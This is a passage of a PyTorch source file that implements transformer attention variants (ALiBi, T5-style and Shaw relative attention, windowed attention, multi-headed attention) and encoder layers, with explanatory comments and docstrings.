        logits = torch.matmul(query, key.transpose(-2, -1))
        if mask is not None:
            logits = logits.masked_fill(mask == MASK_FALSE, -1e9)
        return F.softmax(logits, dim=-1)
class SeqDotProductAttentionALiBi(SequenceSequenceAttention):
    """Unscaled dot-product attention with ALiBi (linear positional bias) per head.

    See https://arxiv.org/pdf/2108.12409.pdf; unscaled counterpart of
    `SeqScaledDotProductAttentionALiBi`.
    """

    def __init__(self, pdrop: float = 0.1, num_heads=None, **kwargs):
        """
        :param pdrop: Dropout probability applied to the attention weights
        :param num_heads: Number of attention heads (one ALiBi slope per head)
        """
        super().__init__(pdrop=pdrop, **kwargs)
        self.num_heads = num_heads
        # Fixed (non-learned) per-head slopes; a buffer so they follow the module's device
        slopes = torch.tensor(get_alibi_slopes(self.num_heads))
        self.register_buffer("slopes", slopes)

    def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
        """Compute softmax(QK^T + ALiBi bias), optionally masked.

        :param query: queries [B, H, T_q, D]
        :param key: keys [B, H, T_k, D]
        :param mask: mask to prevent attending where we shouldn't
        :return: attention weights [B, H, T_q, T_k]
        """
        scores = torch.matmul(query, key.transpose(-2, -1))
        T_k = scores.shape[-1]
        T_q = scores.shape[-2]
        # Fix: the offset matrix must be [T_q, T_k] (query index down the rows,
        # key index across the columns) to line up with `scores`. The previous
        # `arange(T_q).view(1, -1) - arange(T_k).view(-1, 1)` produced the
        # transposed [T_k, T_q] matrix, which mis-broadcast whenever
        # T_q != T_k. This now matches SeqScaledDotProductAttentionALiBi.
        offsets = - torch.abs(torch.arange(T_q).view(-1, 1) - torch.arange(T_k).view(1, -1)).to(self.slopes.device)  # [T_q, T_k]
        alibi = self.slopes.unsqueeze(-1).unsqueeze(-1) * offsets.unsqueeze(0)  # [H, T_q, T_k]
        alibi = alibi.unsqueeze(0)  # [1, H, T_q, T_k]
        scores += alibi
        if mask is not None:
            scores = scores.masked_fill(mask == MASK_FALSE, -1e9)
        return F.softmax(scores, dim=-1)
class SeqDotProductAttentionT5(SequenceSequenceAttention):
    """Unscaled dot-product attention with T5-style learned relative position biases."""
    def __init__(self, pdrop: float = 0.1, num_heads=None, bidirectional=True, num_buckets=32, max_distance=128, **kwargs):
        """
        :param pdrop: Dropout probability applied to the attention weights
        :param num_heads: Number of attention heads
        :param bidirectional: If True, bucket forward and backward offsets separately
        :param num_buckets: Number of relative-position buckets
        :param max_distance: Offsets beyond this distance share the final buckets
        """
        super().__init__(pdrop=pdrop, **kwargs)
        self.num_heads = num_heads
        self.bidirectional = bidirectional
        self.num_buckets = num_buckets
        self.max_distance = max_distance
        # Learned per-head bias for each relative-position bucket
        rel_embedding = torch.nn.init.kaiming_normal_(torch.empty((self.num_heads, self.num_buckets),
                                                                  dtype=torch.float), nonlinearity='linear')
        self.rel_embedding = nn.Parameter(rel_embedding, requires_grad=True)
    def _relative_position_bucket(self, relative_position):
        """Taken from https://github.com/tensorflow/mesh/blob/bbb6ce7917e2a8ef1f3dc6990fcacd4f3b075acd/mesh_tensorflow/transformer/transformer_layers.py#L1014
        Map signed relative offsets to bucket ids: small offsets get exact
        buckets, larger ones are bucketed logarithmically up to `max_distance`.
        """
        ret = 0
        n = -relative_position
        num_buckets = self.num_buckets
        if self.bidirectional:
            # Split the buckets between negative and positive offsets
            num_buckets //= 2
            ret += torch.lt(n, 0).to(dtype=torch.long) * num_buckets
            n = torch.abs(n).to(dtype=torch.long)
        else:
            n = torch.maximum(n, 0).to(dtype=torch.long)
        # now n is in the range [0, inf)
        max_exact = num_buckets // 2
        is_small = torch.lt(n, max_exact)
        # Log-spaced buckets for larger offsets, capped at the last bucket
        val_if_large = max_exact + (
            torch.log(n.to(dtype=torch.float32) / max_exact)
            / math.log(self.max_distance / max_exact) * (num_buckets - max_exact)).to(dtype=torch.long)
        val_if_large = torch.minimum(val_if_large, torch.tensor(num_buckets - 1))
        ret += torch.where(is_small, n, val_if_large)
        return ret
    def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
        """Relative Attention described in https://arxiv.org/abs/1910.10683
        :param query: a query for alignment.
        :param key: a set of keys from encoder or self
        :param mask: masking (for destination) to prevent seeing what we shouldnt
        :return: A tensor that is (BxHxTxT)
        """
        # (., H, T_q, T_k) = (., H, T_q, D) x (., H, D, T_k); no sqrt(d_k) scaling here
        scores = torch.matmul(query, key.transpose(-2, -1))
        T_k = scores.shape[-1]
        T_q = scores.shape[-2]
        # Signed offset between each query position and each key position
        memory_position = torch.arange(T_k).view(1, -1)
        query_position = torch.arange(T_q).view(-1, 1)
        relative_position = memory_position - query_position
        rp_bucket = self._relative_position_bucket(relative_position)
        # Look up the per-head bias for each bucket: [H, T_q, T_k]
        relative_attention_bias = self.rel_embedding[:, rp_bucket]
        scores += relative_attention_bias
        if mask is not None:
            scores = scores.masked_fill(mask == MASK_FALSE, -1e9)  # [B, 1, 1, T_k] broadcast to [B, 1, T_q, T_k]
        return F.softmax(scores, dim=-1)
class SequenceSequenceRelativeAttention(nn.Module):
    """This form of attention is specified in Shaw et al 2018: https://www.aclweb.org/anthology/N18-2074.pdf
    Base class: subclasses implement `_attention` (which also consumes the
    relative key embeddings); `_update` additionally mixes in the relative
    (edge) value embeddings.
    """
    def __init__(self, hsz: int = None, pdrop: float = 0.1, **kwargs):
        """
        :param hsz: Hidden size (stored; not used directly in this base class)
        :param pdrop: Dropout probability applied to the attention weights
        """
        super().__init__()
        self.hsz = hsz
        self.dropout = nn.Dropout(pdrop)
        # Most recent (pre-dropout) attention weights, kept for inspection
        self.attn = None
    def forward(
        self, q_k_v_ek_ev_m: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]
    ) -> torch.Tensor:
        """Take in a tuple of tensors corresponding to the query, key, value, edges_key, edges_value and mask variables
        :param q_k_v_ek_ev_m: A tuple consisting of query, key, value, `edges_key`, `edges_value` and `mask` respectively
        :return: An updated value Tensor
        """
        query, key, value, edges_key, edges_value, mask = q_k_v_ek_ev_m
        a = self._attention(query, key, edges_key, mask)
        self.attn = a
        a = self.dropout(a)
        return self._update(a, value, edges_value)
    def _attention(
        self, query: torch.Tensor, key: torch.Tensor, edges_key: torch.Tensor, mask: Optional[torch.Tensor] = None
    ) -> torch.Tensor:
        # Abstract: subclasses compute the normalized attention weights here
        pass
    def _update(self, a: torch.Tensor, value: torch.Tensor, edges_value: torch.Tensor) -> torch.Tensor:
        """Attention weights are applied for each value, but in a series of efficient matrix operations.
        In the case of self-attention, the key and query (used to create the attention weights)
        and values are all low order projections of the same input.
        :param a: The attention weights [B, H, T_q, T_k]
        :param value: The values [B, H, T_k, D]
        :param edges_value: The edge values [T_q, T_k, D]
        :returns: A tensor of shape [B, H, T, D]
        """
        B, H, T_k, D = value.shape
        updated_values = torch.matmul(a, value)  # [B, H, T_q, D]
        if edges_value is not None:
            # Fold batch and heads and put time first so each query position's
            # weights multiply its own [T_k, D] slice of edge values
            a = a.view(B * H, -1, T_k).transpose(0, 1)  # (T_q, BxH, T_k)
            t = torch.matmul(a, edges_value)  # (T_q, BxH, D)
            update_edge_values = t.transpose(0, 1).view(B, H, -1, D)
            return updated_values + update_edge_values
        else:
            return updated_values
class SeqScaledDotProductRelativeAttention(SequenceSequenceRelativeAttention):
    """Scaled dot-product attention with Shaw-style relative position embeddings on the keys."""
    def __init__(self, pdrop: float = 0.1, **kwargs):
        super().__init__(pdrop=pdrop, **kwargs)
    def _attention(
        self, query: torch.Tensor, key: torch.Tensor, edges_key: torch.Tensor, mask: Optional[torch.Tensor] = None
    ) -> torch.Tensor:
        """Scaled dot product attention, as defined in https://arxiv.org/abs/1706.03762
        We apply the query to the keys to receive our weights via softmax in a series of efficient
        matrix operations. In the case of self-attention the key and query are all low order
        projections of the same input.
        :param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
        :param key: a set of keys from encoder or self
        :param mask: masking (for destination) to prevent seeing what we shouldnt
        :param edges_key: a matrix of relative embeddings between each word in a sequence [T_q x T_k x D]
        :return: A tensor that is (B x H x T_q x T_k)
        """
        B, H, T_q, d_k = query.shape  # (., H, T_q, T_k) = (., H, T_q, D) x (., H, D, T_k)
        # Content-content scores
        scores_qk = torch.matmul(query, key.transpose(-2, -1))
        # Content-position scores: fold batch/heads and put time first so each
        # query position multiplies its own slice of relative key embeddings
        tbhd = query.reshape(B * H, T_q, d_k).transpose(0, 1)  # [T_q, B*H, d_k]
        scores_qek = torch.matmul(tbhd, edges_key.transpose(-2, -1))  # [T_q, B*H, T_k]
        scores_qek = scores_qek.transpose(0, 1).view(B, H, T_q, -1)  # [B, H, T_q, T_k]
        scores = (scores_qk + scores_qek) / math.sqrt(d_k)
        # only for cross-attention T_q != T_k. for such case, mask should be src_mask, which is a sequence_mask with
        # dimension [B, 1, 1, T_k], and will be broadcast to dim of scores:
        if mask is not None:
            scores = scores.masked_fill(mask == MASK_FALSE, -1e9)
        return F.softmax(scores, dim=-1)
class SeqDotProductRelativeAttention(SequenceSequenceRelativeAttention):
    """Unscaled variant of Shaw-style relative attention: softmax(QK^T + Q·E_k^T)."""

    def __init__(self, pdrop: float = 0.1, **kwargs):
        super().__init__(pdrop=pdrop, **kwargs)

    def _attention(
        self, query: torch.Tensor, key: torch.Tensor, edges_key: torch.Tensor, mask: Optional[torch.Tensor] = None
    ) -> torch.Tensor:
        B, H, T_q, d_k = query.shape
        # Content-content term: [B, H, T_q, T_k]
        content_scores = torch.matmul(query, key.transpose(-2, -1))
        # Content-position term: fold batch and heads, put time first so each
        # query position multiplies its own slice of relative key embeddings
        q_time_first = query.reshape(B * H, T_q, d_k).transpose(0, 1)
        edge_scores = torch.matmul(q_time_first, edges_key.transpose(-2, -1))
        edge_scores = edge_scores.transpose(0, 1).view(B, H, T_q, -1)
        logits = content_scores + edge_scores
        if mask is not None:
            logits = logits.masked_fill(mask == MASK_FALSE, -1e9)
        return F.softmax(logits, dim=-1)
def unfold_tensor(tensor, dim, window_sz):
    """Unfold a tensor by applying a sliding window on a certain dimension with step 1 and padding of 0's. The window
    dimension is added as the last dimension

    :param tensor: the tensor to be unfolded, with shape [d_1, d_2, ..., T, ..., d_n]
    :param dim: the dimension along which unfolding is applied
    :param window_sz: sliding window size, need to be an odd number
    :return: the unfolded tensor with shape [d_1, d_2, ..., T, ..., d_n, window_sz]
    """
    half = (window_sz - 1) // 2
    ndim = len(tensor.shape)
    if dim < 0:
        dim += ndim
    # F.pad consumes dims from last to first: emit zero-pad pairs for every dim
    # after the target one, then pad half the window on each side of the target
    pad_spec = [0, 0] * (ndim - dim - 1) + [half, half]
    padded = F.pad(tensor, pad_spec)
    return padded.unfold(dim, window_sz, 1)
class SeqScaledWindowedRelativeAttention(SequenceSequenceRelativeAttention):
    """This class implements windowed relative attention, i.e. preventing attention beyond rpr_k. For efficiency,
    _attention and _update are implemented in a different way."""

    def __init__(self, pdrop: float = 0.1, **kwargs):
        super().__init__(pdrop=pdrop, **kwargs)

    def _unfold_mask(self, mask, batchsz, rpr_k):
        """Transform mask into the unfolded (windowed) format.

        :param mask: a sequence mask [B, 1, 1, T] or a subsequent mask [1/B, 1, T, T]
        :param batchsz: batch size B
        :param rpr_k: the relative attention window radius
        :return: the unfolded mask [B, 1, T, W] with W = 2*rpr_k + 1
        """
        window_sz = 2 * rpr_k + 1
        T = mask.shape[3]
        if mask.shape[2] > 1:  # mask is from a subsequent mask, with [1, 1, T, T] or [B, 1, T, T]
            logger.warning("Using subsequent mask with long sequence may cause OOM error.")
            mask = mask.expand(batchsz, 1, T, T)  # expand sequence/subsequent mask into a uniform dim
            mask = F.pad(mask, [rpr_k, rpr_k])  # pad both sides with rpr_k, [B, 1, T, T + 2*rpr_k]
            seq = torch.arange(T + 2 * rpr_k)
            indices = seq.unfold(0, window_sz, 1)  # indices of a sliding window, [T, W]
            indices = indices.unsqueeze(0).unsqueeze(0).expand(batchsz, 1, T, window_sz).to(mask.device)
            return torch.gather(mask, -1, indices)  # [B, 1, T, W]
        else:  # mask is a sequence mask [B, 1, 1, T]
            unfolded = unfold_tensor(mask, dim=-1, window_sz=window_sz)  # [B, 1, 1, T, W]
            return unfolded.squeeze(1)  # [B, 1, T, W]

    def _attention(
        self, query: torch.Tensor, key: torch.Tensor, rpr_key: torch.Tensor, mask: Optional[torch.Tensor] = None
    ) -> torch.Tensor:
        """Implementation of attention considering RA masking: using torch.Tensor.unfold to create an extra dimension
        representing the sliding window. Then when applying matmul, Q, K, V share the same T dimension.

        :param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
        :param key: a set of keys from encoder or self
        :param mask: masking (for destination) to prevent seeing what we shouldnt
        :param rpr_key: tensor of the rpr_key embeddings [W, d_k]
        :return: A tensor that is [B, H, T, 1, W] to be matmul with values
        """
        B, H, T, d_k = query.shape
        window_sz = rpr_key.shape[0]
        rpr_k = (window_sz - 1) // 2
        query = query.unsqueeze(-2)  # [B, H, T, 1, d_k]
        key = unfold_tensor(key, dim=2, window_sz=window_sz)  # [B, H, T, d_k, W]
        rpr_key = rpr_key.transpose(0, 1).unsqueeze(0).unsqueeze(0).unsqueeze(0)  # [1, 1, 1, d_k, W]
        scores_qk = torch.matmul(query, key)  # [B, H, T, 1, W]
        scores_qrk = torch.matmul(query, rpr_key)  # [B, H, T, 1, W]
        scores = (scores_qk + scores_qrk) / math.sqrt(d_k)
        if mask is not None:
            mask = self._unfold_mask(mask, B, rpr_k).unsqueeze(-2)  # [B, 1, T, 1, W]
            # Consistency fix: use the module-level MASK_FALSE sentinel like the other
            # attention classes in this file (was a literal `False` comparison)
            scores = scores.masked_fill(mask == MASK_FALSE, -1e9)
        return F.softmax(scores, dim=-1)

    def _update(self, a: torch.Tensor, value: torch.Tensor, rpr_value: torch.Tensor) -> torch.Tensor:
        """Apply the windowed attention weights to the (unfolded) values plus optional relative-position values.

        :param a: attention weights [B, H, T, 1, W]
        :param value: value tensor [B, H, T, d_value]
        :param rpr_value: optional relative-position value embeddings [W, d_value]
        :return: updated values [B, H, T, d_value]
        """
        window_sz = a.shape[-1]
        value = unfold_tensor(value, dim=2, window_sz=window_sz).transpose(-1, -2)  # [B, H, T, W, d_value]
        updated_values = torch.matmul(a, value)  # [B, H, T, 1, d_value]
        if rpr_value is not None:
            rpr_value = rpr_value.unsqueeze(0).unsqueeze(0).unsqueeze(0)  # [1, 1, 1, W, d_value]
            update_rpr_values = torch.matmul(a, rpr_value)  # [B, H, T, 1, d_value]
            return (updated_values + update_rpr_values).squeeze(3)  # [B, H, T, d_value]
        else:
            return updated_values.squeeze(3)
class SeqBahdanauAttention(SequenceSequenceAttention):
    """Additive (Bahdanau-style) attention: score = V^T tanh(Q + K), softmaxed over keys.

    NOTE(review): the `mask` argument is accepted but not applied in `_attention`,
    unlike the dot-product variants in this file -- confirm whether that is intended.
    """

    def __init__(self, hsz: int, pdrop: float = 0.1, **kwargs):
        super().__init__(hsz, pdrop=pdrop, **kwargs)
        self.V = pytorch_linear(self.hsz, 1, bias=False)

    def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
        """Score every query step against every key step additively.

        :param query: [B, H, T, D] query heads
        :param key: [B, H, T, D] key heads
        :param mask: accepted for interface compatibility (currently unused)
        :return: attention weights [B, H, T, T]
        """
        # Broadcast-add: [B, H, T, 1, D] + [B, H, 1, T, D] -> [B, H, T, T, D]
        pairwise = torch.tanh(query.unsqueeze(-2) + key.unsqueeze(-3))
        # Learned projection to a scalar per pair: [B, H, T, T, 1] -> [B, H, T, T]
        scores = self.V(pairwise).squeeze(-1)
        return F.softmax(scores, dim=-1)
class MultiHeadedAttention(nn.Module):
    """
    Multi-headed attention from https://arxiv.org/abs/1706.03762 via http://nlp.seas.harvard.edu/2018/04/03/attention.html

    Multi-headed attention provides multiple looks of low-order projections K, Q and V using an attention function
    (specifically `scaled_dot_product_attention` in the paper. This allows multiple relationships to be illuminated
    via attention on different positional and representational information from each head.

    The number of heads `h` times the low-order projection dim `d_k` is equal to `d_model` (which is asserted upfront).
    This means that each weight matrix can be simply represented as a linear transformation from `d_model` to `d_model`,
    and partitioned into heads after the fact.

    Finally, an output projection is applied which brings the output space back to `d_model`, in preparation for the
    sub-sequent `FFN` sub-layer.

    There are 3 uses of multi-head attention in the Transformer.
    For encoder-decoder layers, the queries come from the previous decoder layer, and the memory keys come from
    the encoder. For encoder layers, the K, Q and V all come from the output of the previous layer of the encoder.
    And for self-attention in the decoder, K, Q and V all come from the decoder, but here it is masked to prevent using
    future values
    """

    def __init__(
        self, num_heads: int, d_model: int, dropout: float = 0.1, scale: bool = False, d_k: Optional[int] = None, ra_type: Optional[str] = None,
    ):
        """Constructor for multi-headed attention

        :param num_heads: The number of heads
        :param d_model: The model hidden size
        :param dropout (``float``): The amount of dropout to use
        :param scale: Should we scale the dot product attention
        :param d_k: The low-order project per head. This is normally `d_model // num_heads` unless set explicitly
        :param ra_type: If there is an attention bias term ('alibi' or 't5'), it is encapsulated in the attention fn
        """
        super().__init__()
        if d_k is None:
            self.d_k = d_model // num_heads
            if d_model % num_heads != 0:
                raise Exception(f"d_model ({d_model}) must be evenly divisible by num_heads ({num_heads})")
        else:
            self.d_k = d_k
        self.h = num_heads
        # for multi-headed attention, w_V projects to h heads, each head has dim d_k; for single headed attention, w_V
        # project to 1 head with dim d_model
        if self.h > 1:
            self.d_value = self.d_k
        else:
            self.d_value = d_model
        # Q/K/V projections; heads are split out of the projected output in forward()
        self.w_Q = Dense(d_model, self.d_k * self.h)
        self.w_K = Dense(d_model, self.d_k * self.h)
        self.w_V = Dense(d_model, self.d_value * self.h)
        if self.h > 1:  # w_O is not needed for single headed attention
            self.w_O = Dense(self.d_k * self.h, d_model)
        # Select the attention implementation: scaled vs unscaled, with an optional
        # relative-attention bias (ALiBi or T5-style) baked into the attention function
        if scale:
            if ra_type == 'alibi':
                self.attn_fn = SeqScaledDotProductAttentionALiBi(dropout, num_heads=num_heads)
            elif ra_type == 't5':
                # TODO: pass through options
                self.attn_fn = SeqScaledDotProductAttentionT5(dropout, num_heads=num_heads)
            else:
                self.attn_fn = SeqScaledDotProductAttention(dropout)
        else:
            if ra_type == 'alibi':
                self.attn_fn = SeqDotProductAttentionALiBi(dropout, num_heads=num_heads)
            elif ra_type == 't5':
                # TODO: pass through options
                self.attn_fn = SeqDotProductAttentionT5(dropout, num_heads=num_heads)
            else:
                self.attn_fn = SeqDotProductAttention(dropout)
        # Holds the last computed attention weights (for inspection/visualization)
        self.attn = None

    def forward(self, qkvm: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Low-order projections of query, key and value into multiple heads, then attention application and dropout

        :param qkvm: a tuple `(query, key, value, mask)`:
            query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
            key: a set of keys from encoder or self
            value: a set of values from encoder or self
            mask: masking (for destination) to prevent seeing what we shouldnt
        :return: Multi-head attention output, result of attention application to sequence (B, T, d_model)
        """
        query, key, value, mask = qkvm
        batchsz = query.size(0)

        # Project then split heads: (B, T, h*d) -> (B, H, T, D)
        query = self.w_Q(query).view(batchsz, -1, self.h, self.d_k).transpose(1, 2)
        key = self.w_K(key).view(batchsz, -1, self.h, self.d_k).transpose(1, 2)
        value = self.w_V(value).view(batchsz, -1, self.h, self.d_value).transpose(1, 2)

        x = self.attn_fn((query, key, value, mask))
        # Stash the attention weights computed by the attention function
        self.attn = self.attn_fn.attn

        # Re-merge heads: (B, H, T, D) -> (B, T, h*D)
        x = x.transpose(1, 2).contiguous().view(batchsz, -1, self.h * self.d_value)
        if self.h > 1:
            return self.w_O(x)
        else:
            return x
class MultiHeadedRelativeAttention(nn.Module):
    """
    Multi-headed relative attention from Shaw et al 2018 (https://www.aclweb.org/anthology/N18-2074.pdf)

    This method follows the same approach of MultiHeadedAttention, but it computes Relative Position Representations (RPR)
    which are used as part of the attention computations. To facilitate this, the model has its own internal
    embeddings lookup table, and it has an updated computation for both the attention weights and the application
    of those weights to follow them.
    """

    def __init__(
        self,
        num_heads: int,
        d_model: int,
        rpr_k: int,
        dropout: float = 0.1,
        scale: bool = False,
        d_k: Optional[int] = None,
        windowed_ra: bool = False,
        rpr_value_on: bool = True
    ):
        """Constructor for multi-headed attention

        :param num_heads: The number of heads
        :param d_model: The model hidden size
        :param rpr_k: distance within which relative positional embedding will be considered
        :param windowed_ra: whether prevent attention beyond rpr_k
        :param dropout (``float``): The amount of dropout to use
        :param scale: Should we scale the dot product attention
        :param d_k: The low-order project per head. This is normally `d_model // num_heads` unless set explicitly
        :param rpr_value_on: whether to also learn relative-position embeddings for the values
        """
        super().__init__()
        if d_k is None:
            self.d_k = d_model // num_heads
            if d_model % num_heads != 0:
                raise Exception(f"d_model ({d_model}) must be evenly divisible by num_heads ({num_heads})")
        else:
            self.d_k = d_k
        self.h = num_heads
        # for multi-headed attention, w_V projects to h heads, each head has dim d_k; for single headed attention, w_V
        # project to 1 head with dim d_model
        if self.h > 1:
            self.d_value = self.d_k
        else:
            self.d_value = d_model
        self.rpr_k = rpr_k
        self.rpr_value_on = rpr_value_on
        # Internal embedding table over relative distances clipped to [-rpr_k, rpr_k],
        # shifted to 0-based indices [0, 2*rpr_k]
        self.rpr_key = nn.Embedding(2 * rpr_k + 1, self.d_k)
        if self.rpr_value_on:
            self.rpr_value = nn.Embedding(2 * rpr_k + 1, self.d_value)
        self.windowed_ra = windowed_ra
        self.w_Q = Dense(d_model, self.d_k * self.h)
        self.w_K = Dense(d_model, self.d_k * self.h)
        self.w_V = Dense(d_model, self.d_value * self.h)
        if self.h > 1:  # w_O is not needed for single headed attention
            self.w_O = Dense(self.d_k * self.h, d_model)
        if scale:
            if windowed_ra:
                self.attn_fn = SeqScaledWindowedRelativeAttention(dropout)
            else:
                self.attn_fn = SeqScaledDotProductRelativeAttention(dropout)
        else:
            self.attn_fn = SeqDotProductRelativeAttention(dropout)
        # Holds the last computed attention weights (for inspection/visualization)
        self.attn = None

    def make_rpr(self, q_len, k_len, device) -> Tuple[torch.Tensor, torch.Tensor]:
        """Create a matrix shifted by self.rpr_k and bounded between 0 and 2*self.rpr_k to provide 0-based indexing for embedding
        """
        q_seq = torch.arange(q_len).to(device)
        k_seq = torch.arange(k_len).to(device)
        window_len = 2 * self.rpr_k
        # Relative distance key_pos - query_pos, shifted into [0, 2*rpr_k] and clipped
        edges = k_seq.view(1, -1) - q_seq.view(-1, 1) + self.rpr_k  # [q_len, k_len]
        edges = torch.clamp(edges, 0, window_len)
        if self.rpr_value_on:
            return self.rpr_key(edges), self.rpr_value(edges)  # [q_len, k_len, d_k]
        else:
            return self.rpr_key(edges), None

    def make_windowed_rpr(self, device):
        """Look up the full window of relative embeddings [2*rpr_k + 1, d_k] for windowed RA."""
        window_len = 2 * self.rpr_k + 1
        window = torch.arange(window_len).to(device)
        if self.rpr_value_on:
            return self.rpr_key(window), self.rpr_value(window)
        else:
            return self.rpr_key(window), None

    def forward(self, qkvm: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Low-order projections of query, key and value into multiple heads, then attention application and dropout

        :param qkvm: a tuple `(query, key, value, mask)`:
            query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
            key: a set of keys from encoder or self
            value: a set of values from encoder or self
            mask: masking (for destination) to prevent seeing what we shouldnt
        :return: Multi-head attention output, result of attention application to sequence (B, T, d_model)
        """
        query, key, value, mask = qkvm
        batchsz = query.size(0)
        query_len = query.size(1)
        key_len = key.size(1)  # key and value have the same length, but query can have a different length

        # Project then split heads: (B, T, h*d) -> (B, H, T, D)
        query = self.w_Q(query).view(batchsz, -1, self.h, self.d_k).transpose(1, 2)
        key = self.w_K(key).view(batchsz, -1, self.h, self.d_k).transpose(1, 2)
        value = self.w_V(value).view(batchsz, -1, self.h, self.d_value).transpose(1, 2)

        if self.windowed_ra:
            rpr_key, rpr_value = self.make_windowed_rpr(query.device)
        else:
            rpr_key, rpr_value = self.make_rpr(query_len, key_len, query.device)
        x = self.attn_fn((query, key, value, rpr_key, rpr_value, mask))
        self.attn = self.attn_fn.attn

        # Re-merge heads: (B, H, T, D) -> (B, T, h*D)
        x = x.transpose(1, 2).contiguous().view(batchsz, -1, self.h * self.d_value)
        if self.h > 1:
            return self.w_O(x)
        else:
            return x
class TransformerEncoderBase(nn.Module):
    """Common construction for the transformer encoder layer variants.

    Builds the self-attention sub-layer (optionally with relative attention), the
    position-wise FFN, two layer norms and dropout; subclasses only differ in where
    the layer norms are applied in `forward`.
    """

    def __init__(
        self,
        num_heads: int,
        d_model: int,
        pdrop: float,
        scale: bool = True,
        activation_type: str = "gelu",
        d_ff: Optional[int] = None,
        d_k: Optional[int] = None,
        rpr_k: Optional[int] = None,
        ffn_pdrop: Optional[float] = 0.0,
        layer_norm_eps: float = 1.0e-6,
        windowed_ra: Optional[bool] = False,
        rpr_value_on: bool = True,
        ra_type: Optional[str] = None,
        **kwargs,
    ):
        """
        :param num_heads: The number of attention heads
        :param d_model: The model hidden size
        :param pdrop: dropout applied to the residual branches
        :param scale: Should the dot-product attention be scaled
        :param activation_type: activation for the FFN (default gelu)
        :param d_ff: FFN inner size; defaults to 4 * d_model
        :param d_k: optional explicit per-head dim
        :param rpr_k: if set and non-zero, use Shaw-style relative attention with this radius
        :param ffn_pdrop: dropout applied inside the FFN
        :param layer_norm_eps: epsilon for the layer norms
        :param windowed_ra: whether to prevent attention beyond rpr_k (relative attention only)
        :param rpr_value_on: whether relative attention also learns value embeddings
        :param ra_type: relative-attention bias flavor ('alibi' or 't5') for the non-RPR path
        """
        super().__init__()
        self.d_model = d_model
        self.d_ff = d_ff if d_ff is not None else 4 * d_model
        # rpr_k selects Shaw-style relative attention; otherwise plain MHA (optionally
        # with an ALiBi/T5 bias chosen via ra_type)
        if rpr_k is not None and rpr_k != 0:
            self.self_attn = MultiHeadedRelativeAttention(num_heads, d_model, rpr_k, pdrop, scale, d_k=d_k,
                                                          windowed_ra=windowed_ra, rpr_value_on=rpr_value_on)
        else:
            self.self_attn = MultiHeadedAttention(num_heads, d_model, pdrop, scale=scale, d_k=d_k, ra_type=ra_type)
        # Position-wise feed-forward: expand to d_ff, activate, dropout, project back
        self.ffn = nn.Sequential(
            Dense(self.d_model, self.d_ff),
            get_activation(activation_type),
            nn.Dropout(ffn_pdrop),
            Dense(self.d_ff, self.d_model),
        )
        self.ln1 = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
        self.ln2 = nn.LayerNorm(self.d_model, eps=layer_norm_eps)
        self.dropout = nn.Dropout(pdrop)
class PreLNTransformerEncoder(TransformerEncoderBase):
    """Pre-layer-norm encoder layer: each residual branch normalizes its input first."""

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """
        :param inputs: `(x, mask)`
        :return: The output tensor
        """
        x, mask = inputs
        # Self-attention branch: LN -> attn -> dropout -> residual add
        normed = self.ln1(x)
        x = x + self.dropout(self.self_attn((normed, normed, normed, mask)))
        # FFN branch: LN -> FFN -> dropout -> residual add
        normed = self.ln2(x)
        x = x + self.dropout(self.ffn(normed))
        return x
class PreLNBeforeResConnTransformerEncoder(TransformerEncoderBase):
    """Encoder layer where layer norm is applied before each residual connection (the normed
    value itself carries into the residual, unlike the classic pre-LN variant)."""

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """
        :param inputs: `(x, mask)`
        :return: The output tensor
        """
        x, mask = inputs
        # Note: the normalized tensor is BOTH the attention input and the residual base
        x = self.ln1(x)
        x = x + self.dropout(self.self_attn((x, x, x, mask)))
        x = self.ln2(x)
        x = x + self.dropout(self.ffn(x))
        return x
class PostLNTransformerEncoder(TransformerEncoderBase):
    """Post-layer-norm encoder layer (original Transformer ordering): LN follows each residual add."""

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """
        :param inputs: `(x, mask)`
        :return: The output tensor
        """
        x, mask = inputs
        x = x + self.dropout(self.self_attn((x, x, x, mask)))
        x = self.ln2(x)
        x = x + self.dropout(self.ffn(x))
        # ln1 closes the layer here (ln2 sits between the sub-layers)
        return self.ln1(x)
class SpatialGatingUnit(nn.Module):
    """Spatial gating unit

    There are 2 ways we can look at this unit, as an MLP or a Conv with kernel length 1

    l = nn.Linear(T, T)
    c = nn.Conv1d(T, T, 1)
    l(x.transpose(1, 2)).transpose(1, 2)
    c(x)
    """

    def __init__(self,
                 d_ffn: int,
                 nctx: int,
                 layer_norm_eps: float = 1.0e-6):
        super().__init__()
        # The gate half of the split is d_ffn // 2 wide
        self.norm = nn.LayerNorm(d_ffn // 2, eps=layer_norm_eps)
        # Kernel-1 conv over the time axis == per-feature linear mixing across T
        self.proj = pytorch_conv1d(nctx, nctx, 1)
        # Bias of 1 makes the unit start close to identity gating
        nn.init.constant_(self.proj.bias, 1.0)

    def split(self, x):
        """Halve the last (feature) dimension into a residual half and a gate half."""
        return x.chunk(2, dim=-1)

    def forward(self, x):
        residual, gate = self.split(x)
        gate = self.proj(self.norm(gate))
        return residual * gate
class GatedMLPEncoder(nn.Module):
    """A single gMLP block, following https://arxiv.org/pdf/2105.08050.pdf

    Channel projection up to d_ff, activation, spatial gating over the time axis,
    then channel projection back down, wrapped in a residual connection.
    """

    def __init__(
        self,
        d_model: int,
        pdrop: float,
        nctx: int = 256,
        activation_type: str = "gelu",
        d_ff: Optional[int] = None,
        ffn_pdrop: Optional[float] = 0.0,
        layer_norm_eps: float = 1.0e-6
    ):
        """
        :param d_model: The model hidden size
        :param pdrop: dropout applied around the block
